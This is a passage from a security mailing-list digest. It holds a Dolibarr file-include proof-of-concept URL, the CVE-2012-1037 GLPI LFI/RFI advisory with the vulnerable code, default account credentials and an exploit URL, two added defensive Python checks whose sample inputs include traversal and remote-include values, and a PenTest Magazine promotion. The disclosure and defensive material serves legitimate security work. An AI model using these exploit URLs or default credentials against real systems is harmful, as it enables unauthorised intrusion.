http://xxx.com/comm/action/fiche.php?action=create&actioncode=AC_RDV&contactid=1&socid=1&backtopage=../common/[FILE INCLUDE VULNERABILITY!]

Risk:
=====
The security risk of the file include vulnerabilities is estimated as high(+).

Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri & Ucha Gobejishvili (longrifle0x) 

    						Copyright © 2011|Vulnerability-Lab

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin <at> vulnerability-lab.com or support <at> vulnerability-lab.com
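
Added example, not Dolibarr's own code: the containment check a document-serving endpoint such as document.php needs before opening a `file` parameter, run over constructed values that include the `../` shape from the PoC URLs above. The directory is a throwaway temp dir standing in for the project document store; the sample values are assumptions.

```python
import os
import tempfile

def resolve_document(base_dir, requested):
    """Return the real path of `requested` inside base_dir, or None if it escapes.

    realpath() normalises ../ segments and follows symlinks, so a link inside
    base_dir that points outside is rejected as well. os.path.join() discards
    base_dir when `requested` is absolute; the prefix test catches that too.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if not candidate.startswith(base + os.sep):
        return None
    return candidate

def check_requests(base_dir, requests):
    """Map each candidate `file` value to 'allowed' or 'rejected'."""
    return {r: ("allowed" if resolve_document(base_dir, r) else "rejected")
            for r in requests}

# Constructed `file` values; the traversal entries mirror the ../ shape in the PoC URLs.
SAMPLE_REQUESTS = ["report.pdf", "2012/../report.pdf", "../outside.txt",
                   "/tmp/outside.txt", ""]

def demo():
    """Run the check against a temp dir standing in for the project document store."""
    with tempfile.TemporaryDirectory() as base:
        return check_requests(base, SAMPLE_REQUESTS)

if __name__ == "__main__":
    for value, verdict in demo().items():
        print(f"{value!r:24} {verdict}")
```

`2012/../report.pdf` is allowed because it normalises back inside the store; the empty string is rejected because it resolves to the directory itself.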


Emilien Girault | 10 Feb 11:40

CVE-2012-1037: GLPI <= 0.80.61 LFI/RFI

Severity: Important

Vendor: GLPI - http://www.glpi-project.org

Versions Affected
=================

All versions between 0.78 and 0.80.61

Description
===========

GLPI fails to properly sanitize the GET 'sub_type' parameter in the front/popup.php file:

  [...]
  checkLoginUser();

  if (isset($_GET["popup"])) {
     $_SESSION["glpipopup"]["name"] = $_GET["popup"];
  }

  if (isset($_SESSION["glpipopup"]["name"])) {
    switch ($_SESSION["glpipopup"]["name"]) {
  [...]
    case "add_ruleparameter" :
           popHeader($LANG['ldap'][35], $_SERVER['PHP_SELF']);
           include strtolower($_GET['sub_type']."Parameter.php");   // <======= 
           break;
  [...]

To be triggered, the attacker needs to be authenticated. However, GLPI provides default accounts that
often aren't changed or disabled:

    glpi/glpi
    tech/tech
    normal/normal
    post-only/postonly

Impact
======

Since there is a suffix, the vulnerability can be used as an RFI (requires allow_url_include = On).

For LFI, the target file has to end with "parameter.php". GLPI automatically escapes all GET and POST
parameters with addslashes(), so the null byte technique is not usable. I have not tested exploitation
using the path truncation technique but it might be possible.

Mitigation
==========

Upgrade to GLPI 0.80.7.

Exploit
=======

http://<server>/front/popup.php?popup=add_ruleparameter&sub_type=<file>

Timeline
========

08 feb 2012 - Found the bug.
09 feb 2012 - Contacted the GLPI Team.
09 feb 2012 - Bug fixed & new version available.

Thanks to the GLPI team for being responsive!

References
==========

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1037
https://forge.indepnet.net/projects/glpi/versions/685
https://forge.indepnet.net/projects/glpi/repository/revisions/17457/diff/branches/0.80-bugfixes/front/popup.php

-- 
Emilien Girault

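Added example, not part of this advisory and not GLPI's own fix: an allowlist check for `sub_type` of the kind a patched front/popup.php should apply before the include, plus a scan of constructed access-log lines for popup.php requests whose `sub_type` fails it. The allowlist pattern, the log format and the addresses are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# A legitimate sub_type is a bare identifier: strtolower(sub_type . "Parameter.php")
# then names a file inside the application tree. Allowlist policy assumed for this
# example; it is not the change GLPI shipped in 0.80.7.
SAFE_SUB_TYPE = re.compile(r"^[A-Za-z0-9_]+$")

def is_safe_sub_type(value):
    """Check a patched front/popup.php could apply before the include."""
    return bool(SAFE_SUB_TYPE.match(value))

def classify_sub_type(value):
    """Label a rejected value by the technique its shape points at."""
    if is_safe_sub_type(value):
        return "ok"
    if re.match(r"^[a-z][a-z0-9+.-]*://", value, re.I):
        return "rfi"        # only works with allow_url_include=On
    if "/" in value or "\\" in value or "\x00" in value:
        return "lfi"        # traversal; the suffix still forces *parameter.php
    return "suspicious"

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

def scan_access_log(lines):
    """Return (line_no, label, sub_type) for popup.php hits that fail the check.
    popup= is kept in the session, so a later request may carry only sub_type."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not url.path.endswith("/front/popup.php"):
            continue
        for value in parse_qs(url.query).get("sub_type", []):
            label = classify_sub_type(value)
            if label != "ok":
                findings.append((line_no, label, value))
    return findings

# Constructed access-log lines (combined format); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Feb/2012:10:00:01 +0000] "GET /front/popup.php?popup=add_ruleparameter&sub_type=Rule HTTP/1.1" 200 512',
    '203.0.113.5 - - [09/Feb/2012:10:00:02 +0000] "GET /front/popup.php?popup=add_ruleparameter&sub_type=http://203.0.113.9/x HTTP/1.1" 200 88',
    '203.0.113.5 - - [09/Feb/2012:10:00:03 +0000] "GET /front/popup.php?sub_type=../../inc/ HTTP/1.1" 500 0',
    '198.51.100.7 - - [09/Feb/2012:10:00:04 +0000] "GET /front/central.php HTTP/1.1" 200 9000',
]
```

The third sample line omits `popup=` and is still flagged, which is why the scan keys on the path and `sub_type` rather than on `popup=add_ruleparameter`.
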

Maciej Kozuszek | 10 Feb 11:32

Celebrate with PenTest Magazine

To celebrate the transformation of PenTest StarterKit edition into 
Auditing & Standards PenTest, we've decided to give everyone access to 4 
full PenTest issues for free.

All you need to do to download them is create a free account. Sign up as 
a free member here:

http://pentestmag.com/subscribe/

And after you activate your account, download all the issues here (click 
"Full version download" button):

PenTest StarterKit (3 issues):
http://pentestmag.com/pentest-starterkit-111/
http://pentestmag.com/pentest-starterkit-211-2/
http://pentestmag.com/pentest-starterkit-12012/
+
Special Social-Engineer.com PenTest Issue:
http://pentestmag.com/social-engineering-pentest-092012/

Enjoy the PenTest Fiesta!

PenTest Team
en <at> pentestmag.com


